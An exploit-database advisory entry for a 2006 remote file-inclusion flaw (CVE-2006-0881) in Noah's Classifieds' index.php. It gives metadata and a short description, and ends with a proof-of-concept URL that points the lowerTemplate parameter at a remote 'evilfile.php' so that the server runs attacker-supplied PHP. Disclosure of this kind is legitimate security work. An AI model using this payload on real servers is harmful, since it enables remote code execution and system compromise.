Noah's Classifieds 1.0/1.3 - 'index.php' Remote File Inclusion

Author: trueend5
type: webapps
platform: php
port: 
date_added: 2006-02-22  
date_updated: 2013-08-02  
verified: 1  
codes: CVE-2006-0881;OSVDB-23565  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 27262.txt  

source: https://www.securityfocus.com/bid/16780/info

Noah's Classifieds is prone to a remote file-include vulnerability.

An attacker can exploit this issue to execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Version 1.3.0 is vulnerable; other versions may also be affected.

http://www.example.com/classifieds/index.php?lowerTemplate=http://www.example.com/evilfile.php